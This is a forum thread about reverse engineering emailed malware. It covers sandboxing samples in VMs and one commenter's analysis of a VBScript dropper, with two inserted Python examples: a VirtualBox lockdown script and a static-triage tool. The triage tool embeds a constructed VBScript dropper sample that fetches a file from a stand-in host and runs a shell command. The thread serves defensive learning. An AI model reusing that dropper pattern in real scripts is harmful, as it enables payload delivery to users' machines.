Does anybody here reverse engineer viruses?
16 05 May 2016 16:44 by u/JamesRussell
One of my very lesser-known emails (as in never used on sites) received a very obvious spam/virus email with the title "I see you", and it also made its way past Gmail's spam filter, so I figure it's got to be more than your average virus. If anybody wants a crack at it, I can forward the message to one of your sanitized throwaways.
Or if there is a more specialized subverse for this question I can post it there.
Thanks guys.
22 comments
7 u/Jefiakra 06 May 2016 01:40
I analyze malware professionally. The fact that it got past Gmail's spam filter doesn't mean much. While I'm not really interested in analyzing your sample (I have access to pretty much all of the fun malware I could possibly want, and this is probably just a banking trojan), I can make a few recommendations for free tools that are usable by a beginner. Obviously, you should only run malware in VMs (I prefer VMware Workstation/Fusion, personally), so keep that in mind if you do decide to look at the thing yourself; you should probably download directly into the VM, in case an exploit kit such as Angler is being used.
All of these tools are relatively easy to use. Google is your friend here, but if you have specific questions, feel free to ask in response or a PM.
0 u/JamesRussell [OP] 06 May 2016 07:54
God damn, that is exactly the type of information I needed on top of what others provided. I'm definitely getting into learning all about how to do this stuff because it's so interesting.
Do you have any opinion on Qubes, or are the VMs you mentioned better?
Thanks for all the resources :)
2 u/Jefiakra 07 May 2016 01:33
Qubes is a Linux distribution that runs every program in its own, Docker-like, container. That's not a VM; it's an OS. It can't run Windows programs without Wine, and I'm not sure how secure Wine is on Qubes. I've looked at Qubes before, but I've never seen any formal inquiry into the claims it makes about its security features.
VirtualBox and VMware allow you to run whole operating systems in their own container. While these can be insecure if improperly configured, they're probably secure if they are (I say probably, because lord knows some government agency has some VM-breaking exploit, but that's not really an issue here), and considered safe for general use. The most secure way to run malware (only relevant for really nasty APTs like the next Stuxnet or something) is probably Bochs, which emulates the hardware rather than using CPU virtualization functionality, but that's slow.
0 u/JamesRussell [OP] 07 May 2016 09:35
I'm glad I asked instead of first trying Qubes, haha.
I'll definitely check out VirtualBox and VMware though and see how it goes.
Anything you feel most people forget about securing on VMs? I'm the type to try to find out all the security issues before doing anything that could possibly become a problem.
0 u/Jefiakra 07 May 2016 16:20
"Ease-of-use" devices, snapshots, and networking are the three biggest things to worry about, in my opinion, though I wouldn't know about anyone forgetting about them. These are honestly just rules of thumb. I break all of them, but you probably shouldn't unless you have a very good idea of the consequences, as you have to take other, more convoluted precautions (which I'm not going over).
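The three rules of thumb above applied to a VirtualBox lab VM, as an added example that is not the commenter's own code: it audits the VM's current settings for the "ease-of-use" devices (shared clipboard, drag-and-drop, shared folders) and the network mode, then emits the VBoxManage commands that disable them, pull the virtual cable, and take a clean baseline snapshot to roll back to after each detonation. It assumes VirtualBox (VMware has equivalents in the .vmx file), that the `--machinereadable` key names match your VirtualBox version, and a host-only interface named vboxnet0; the embedded showvminfo excerpt is constructed.

```python
"""Audit and lock down a VirtualBox malware-analysis VM.

Usage: python vm_lockdown.py <vm-name> [--dry-run]
Added example for this thread; flags are VirtualBox's documented
`VBoxManage modifyvm` / `sharedfolder` / `snapshot` options.
"""
import re
import subprocess
import sys

# Constructed excerpt of `VBoxManage showvminfo <vm> --machinereadable`,
# so the parser can be exercised without VirtualBox installed. Key names
# are as observed in recent VirtualBox releases; confirm against yours.
SAMPLE_VMINFO = '''name="mal-win7"
nic1="nat"
cableconnected1="on"
clipboard="bidirectional"
draganddrop="hosttoguest"
SharedFolderNameMachineMapping1="samples"
SharedFolderPathMachineMapping1="/home/user/samples"
SharedFolderNameMachineMapping2="tools"
SharedFolderPathMachineMapping2="/opt/tools"
'''


def parse_vminfo(vminfo: str) -> dict:
    """key="value" lines of --machinereadable output into a dict."""
    return dict(re.findall(r'^(\w+)="([^"]*)"', vminfo, re.M))


def shared_folders(vminfo: str) -> list:
    """Names of machine-mapped shared folders (a host<->guest file bridge)."""
    return re.findall(r'^SharedFolderNameMachineMapping\d+="([^"]*)"', vminfo, re.M)


def audit(vminfo: str) -> list:
    """Return human-readable findings for settings a lab VM should not have."""
    cfg = parse_vminfo(vminfo)
    findings = []
    if cfg.get("nic1") in ("nat", "bridged"):
        findings.append(f"nic1={cfg['nic1']}: guest can reach the Internet and/or the host LAN")
    if cfg.get("clipboard", "disabled") != "disabled":
        findings.append(f"clipboard={cfg['clipboard']}: shared clipboard crosses the VM boundary")
    if cfg.get("draganddrop", "disabled") != "disabled":
        findings.append(f"draganddrop={cfg['draganddrop']}: drag-and-drop crosses the VM boundary")
    folders = shared_folders(vminfo)
    if folders:
        findings.append("shared folders mounted: " + ", ".join(folders))
    return findings


def lockdown_commands(vm: str, vminfo: str, hostonly_if: str = "vboxnet0") -> list:
    """VBoxManage argument vectors that fix every finding and snapshot the result."""
    cmds = [
        ["VBoxManage", "modifyvm", vm, "--clipboard-mode", "disabled"],
        ["VBoxManage", "modifyvm", vm, "--draganddrop", "disabled"],
        ["VBoxManage", "modifyvm", vm, "--usb", "off"],
        # host-only NIC so the guest can only talk to a fake-DNS/INetSim box on vboxnet0...
        ["VBoxManage", "modifyvm", vm, "--nic1", "hostonly", "--hostonlyadapter1", hostonly_if],
        # ...and keep the virtual cable unplugged until you deliberately connect it.
        ["VBoxManage", "modifyvm", vm, "--cableconnected1", "off"],
    ]
    for name in shared_folders(vminfo):
        cmds.append(["VBoxManage", "sharedfolder", "remove", vm, "--name", name])
    # Snapshot last, so "restore clean-baseline" returns to the hardened state.
    cmds.append(["VBoxManage", "snapshot", vm, "take", "clean-baseline"])
    return cmds


if __name__ == "__main__":
    vm_name = sys.argv[1] if len(sys.argv) > 1 else "mal-win7"
    dry_run = "--dry-run" in sys.argv or len(sys.argv) < 2
    if len(sys.argv) > 1:
        info = subprocess.check_output(
            ["VBoxManage", "showvminfo", vm_name, "--machinereadable"], text=True)
    else:
        info = SAMPLE_VMINFO  # no VM named: demonstrate on the constructed excerpt
    for f in audit(info):
        print("FINDING:", f)
    for cmd in lockdown_commands(vm_name, info):
        print("RUN:" if not dry_run else "WOULD RUN:", " ".join(cmd))
        if not dry_run:
            subprocess.run(cmd, check=True)
```

The snapshot step is the one people skip: without a pristine snapshot taken after the lockdown, every second sample runs on a VM the first one may already have altered.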
1 u/elcob32 05 May 2016 17:21
I've played with a few just to see what makes them work. For the most part the subject isn't all that interesting to me since I don't get paid for that knowledge the same way I get paid for more commercial programming work.
1 u/JamesRussell [OP] 05 May 2016 17:27
It seems quite interesting to me; have you done it much?
I'm just at the beginning stages of coding so I obviously wouldn't have the skills to reverse engineer a virus but I would hopefully like to be able to at some point in future.
How long did it take before you had the skills to reverse engineer?
1 u/elcob32 05 May 2016 17:40
I've only ever done it with the viruses that are emailed to me. I have also programmed a couple of my own just to see if I could. I never made anything more malicious than a virus that could quickly overload a computer's memory by abusing a web browser's ability to process JavaScript code. That would cause a blue screen of death in older versions of Windows and force a reboot, but it didn't do any permanent damage.
You can start tinkering with reverse engineering inside your first year of programming if you really want to. It's kind of tedious though, since decompiled programs have obscure variable names and no comments. That makes the code difficult to read and understand. To make them easier to work with you kind of need to use an editor that can refactor variable names as you come to understand their purpose. Eventually that makes the code more readable and even usable if you so desire.
0 u/JamesRussell [OP] 05 May 2016 17:48
So what would you be looking for in viruses that are emailed to you? Mistakes in the original programmers code? What would that reveal about the programmer?
I think I will probably start out with Python because the ability to create scripts would be a really nice thing to have.
Do you have any resources you think would be good to start out with in programming?
Sorry for all the questions, I just find this whole thing super interesting :)
1 u/elcob32 05 May 2016 18:08
The last time I took the time to reverse engineer a virus it was because it was written in VBScript. I found that fascinating because that is an interpreted language and not compiled code. I wanted to know what it was the programmer was attempting to exploit on the target machine. The scope of his potential victims was limited to Windows computers, but depending on the exploit the virus may have been even more targeted than that. As it turns out it was more limited than that: the virus was targeting Microsoft Office's ActiveX components. Most Windows computers had those files regardless of whether or not MS Office was installed, but to trigger the exploit either Outlook or Word needed to be opened. Only people with MS Outlook or MS Word would be affected. As far as what it did, basically it made several calls back to various servers and awaited a response, most likely to install another more advanced virus.
I don't use Python a lot personally, but I would highly recommend it to new programmers. It is easy to use and read, and you can still accomplish some impressively advanced software with it. There are also libraries that make it so you can write and deploy cross-platform desktop apps (Tkinter), and there is even a new open source platform for web development (Django) that is getting to be pretty impressive.
Not sure which resources would best suit you because we all learn in our own ways, but if you want to mess with reverse engineering you could download a copy of the Linux distro "Kali" and install it on its own partition or thumb drive. It comes with several tools for reverse engineering, so between their built-in documentation and a little Google-fu, you should be able to figure out how that Gmail-immune virus was supposed to affect your machine.
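What the triage described above looks like in practice, as an added example rather than the commenter's own sample or code: a Python script that folds the Chr()/concatenation-built strings in a VBScript dropper and then inventories the COM ProgIDs it instantiates (which tell you whether it needs Word or Outlook present), the URLs it contacts and the commands it runs, all without executing anything. The sample script and its .invalid hostnames are constructed for the example, and the ProgID-to-capability table is this example's own, not exhaustive, assumption.

```python
"""Static triage of a VBScript dropper: decode string building, list ProgIDs,
callback URLs and shell commands. Added example; never runs the script."""
import re

# Constructed sample. Hostnames use the reserved .invalid TLD; nothing here
# is a real campaign or a real server.
SAMPLE = r'''
Dim o, h, u
Set o = CreateObject("WScript" & "." & "Shell")
Set h = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & "2.XMLHTTP")
u = "http://" & "dl.example" & ".invalid/" & "s.bin"
h.Open "GET", u, False
h.Send
Set w = CreateObject("Word.Application")
Set x = CreateObject("Outlook.Application")
o.Run "cmd /c ping example.invalid", 0, True
'''

CHR_RE = re.compile(r'Chr\((\d+)\)', re.I)           # Chr(77) -> "M"
CONCAT_RE = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')  # "a" & "b" -> "ab"
OBJ_RE = re.compile(r'CreateObject\(\s*"([^"]+)"\s*\)', re.I)
URL_RE = re.compile(r'https?://[^"\s]+')
RUN_RE = re.compile(r'\.Run\s+"([^"]+)"', re.I)

# Assumed mapping for this example: what each ProgID lets the script do.
CAPABILITIES = {
    "wscript.shell": "runs commands, reads/writes registry",
    "msxml2.xmlhttp": "HTTP request (callback to a server)",
    "microsoft.xmlhttp": "HTTP request (callback to a server)",
    "adodb.stream": "writes downloaded bytes to disk",
    "scripting.filesystemobject": "file system access",
    "word.application": "Office automation (needs Word installed)",
    "outlook.application": "Office automation (needs Outlook installed)",
}


def fold_strings(src: str) -> str:
    """Replace Chr(N) with a literal and merge adjacent literals until stable."""
    def chr_sub(m):
        n = int(m.group(1))
        # Only printable ASCII is folded; anything else stays visible as Chr(N).
        return '"%s"' % chr(n) if 32 <= n < 127 and chr(n) != '"' else m.group(0)
    src = CHR_RE.sub(chr_sub, src)
    while True:
        merged = CONCAT_RE.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), src)
        if merged == src:
            return src
        src = merged


def requires_office(progids) -> bool:
    """True if the script automates an Office app, i.e. needs it installed."""
    return any(p.lower().startswith(("word.", "outlook.", "excel.")) for p in progids)


def triage(src: str) -> dict:
    folded = fold_strings(src)
    objects = OBJ_RE.findall(folded)
    return {
        "create_objects": objects,
        "capabilities": [CAPABILITIES.get(p.lower(), "unknown ProgID: look it up") for p in objects],
        "urls": URL_RE.findall(folded),
        "run_commands": RUN_RE.findall(folded),
        "needs_office": requires_office(objects),
    }


if __name__ == "__main__":
    report = triage(SAMPLE)
    for progid, what in zip(report["create_objects"], report["capabilities"]):
        print(f"CreateObject {progid:28s} -> {what}")
    print("callback URLs:", report["urls"])
    print("shell commands:", report["run_commands"])
    print("needs Word/Outlook/Excel:", report["needs_office"])
```

The URLs are what you would feed to a sandboxed fake-DNS setup (or simply record) rather than visit from the host; the "needs Office" flag is the same conclusion the commenter reached by hand, reached here from the ProgIDs alone.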
0 u/JamesRussell [OP] 05 May 2016 18:26
Oh, so you would also find out the exploit they were trying to use? That's fascinating, because if it was a previously unknown exploit you could potentially cash in on bug bounty programs as well as finding out what the system target was.
Could you interact in any way with the servers it was trying to call?
I'll definitely be checking out Django though, because I'm a big supporter of open source, so thanks for the heads up.
Yeah, I've recently been messing around with the terminal in Ubuntu, but I was planning on changing distros, and another friend also recommended Kali, so I'll definitely check that out too.
Thanks for all the information man :)
1 u/elcob32 05 May 2016 19:05
Bug bounty programs are typically offered to people who are exploiting servers, not just finding exploits in desktop software. Either way, considering the time it normally takes to do that kind of work, bug bounty programs don't often pay that well.
As for the servers they were not interactive at all. There probably would have been some limited interaction if I had downloaded the file it was calling and attempted to reverse engineer that, but I really wasn't interested enough to take it that far.
0 u/JamesRussell [OP] 05 May 2016 19:32
Huh, TIL. Ah well, the money isn't a huge thing to me anyway, but I love the idea of seeing how deep a rabbit hole like this would go. :)
1 u/elcob32 05 May 2016 19:35
Spoiler Alert. It typically ends with a botnet.
0 u/JamesRussell [OP] 05 May 2016 20:05
Now you've ruined the whole movie!
How would you know when you get to the creamy botnet layer?
1 u/diodine 06 May 2016 03:40
I do. I generally don't spend too much time though being a hobbyist rather than a full time reverse engineer, but if the malware isn't overly complex I will look at it. PM me the files if you want.
0 u/JamesRussell [OP] 06 May 2016 08:00
You're a legend, man :) Just even a simple glance at the code to see what it was targeting would be huge for me, because I feel this virus was targeted since I never used the email in question anywhere on the internet.
I haven't downloaded it yet because I'm still going through the wealth of information all of the other posters have provided, but if you have a free sanitised/throwaway email you could PM me, I could forward it.